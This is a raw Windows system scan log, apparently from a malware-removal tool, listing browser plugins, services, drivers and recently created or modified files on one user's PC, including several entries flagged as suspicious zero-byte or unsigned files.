FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.paceap.com/InitiateActivation [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX(tm))
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows (R) Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
